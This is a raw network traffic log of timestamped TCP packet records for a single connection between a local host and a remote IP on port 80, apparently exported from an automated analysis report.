Mar 30, 2021 14:22:52.931200981 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931216002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931241035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931247950 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931267977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931292057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931308985 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931317091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931343079 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931343079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931370974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931394100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931396961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931418896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931443930 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931467056 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931469917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931494951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931499958 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931520939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931544065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931554079 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931570053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931592941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931617022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931617975 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931643009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931669950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931669950 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931694984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931705952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931720972 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931746006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931761980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931768894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931792974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931813955 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931817055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931840897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931845903 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931868076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931893110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931915045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931921005 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931940079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931965113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931977034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931989908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932014942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932018042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932039022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932048082 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932066917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932094097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932100058 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932116985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932142019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932156086 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932166100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932189941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932193995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932214022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932235956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932261944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932280064 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932286978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932310104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932322979 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932333946 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932351112 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932358027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932382107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932393074 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932408094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932430983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932457924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932480097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932485104 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932503939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932527065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932543039 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932544947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932565928 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932591915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932599068 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932615995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932632923 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932641029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932663918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932681084 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932691097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932717085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932733059 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932740927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932766914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932785034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932790995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932815075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932826042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932838917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932863951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932888985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932894945 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932914972 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932938099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932950020 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932961941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.932982922 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.932986975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933012009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933023930 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.933036089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933060884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933073997 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.933089018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933115005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933130026 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.933137894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933163881 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.933165073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933191061 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933213949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.933224916 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.933255911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.933785915 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.008949041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.008990049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009015083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009040117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009067059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009094000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009119034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009144068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009169102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009170055 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009191990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009219885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009243965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009272099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009275913 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009299994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009324074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009344101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009351015 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009378910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009438992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009458065 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009466887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009493113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009516001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009530067 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009545088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009574890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009589911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009602070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009625912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009649038 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009651899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009677887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009702921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009707928 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009727001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009756088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009757996 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009783030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009805918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009814978 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009831905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009856939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009876966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009881020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009907961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009934902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009957075 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.009972095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.009998083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010003090 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010025024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010061026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010077953 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010087013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010112047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010134935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010158062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010171890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010185003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010210991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010234118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010257006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010279894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010301113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010324955 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010344028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010363102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010366917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010390043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010411978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010432959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010452986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010473013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010473013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010493994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010514021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010535955 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010559082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010576963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010581017 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010597944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010617971 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010637999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010657072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010665894 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010675907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010699987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010720968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010737896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010739088 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.010760069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.010801077 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.012674093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.014148951 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.019712925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019754887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019779921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019804001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019826889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019840002 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.019849062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019862890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.019874096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019901037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019917011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.019927979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019938946 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.019953012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019974947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.019977093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.019996881 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020018101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020026922 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020040035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020061970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020090103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020088911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020116091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020128012 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020140886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020164967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020169020 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020190001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020212889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020231962 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020237923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020251989 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020265102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020292044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020313978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020324945 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020338058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020360947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020361900 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020385981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020407915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020416021 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020432949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020456076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020457029 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020483971 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020507097 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020508051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020533085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020555973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020562887 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020579100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020601988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020606041 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020625114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020647049 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020649910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020678043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020701885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020705938 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020725012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020750046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020750999 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020772934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020795107 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020800114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020824909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020842075 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020849943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020876884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020900011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020900965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020925045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020946026 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.020948887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020976067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020999908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.020998955 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021023989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021044016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021047115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021073103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021090984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021099091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021123886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021146059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021153927 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021172047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021195889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021219015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021219015 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021243095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021267891 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021270037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021292925 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021295071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021320105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021343946 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021356106 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021368027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021394014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021434069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021457911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021481037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021486998 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021505117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021529913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021532059 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021555901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021579027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021580935 CEST	49744	80	192.168.2.4	45.139.236.6
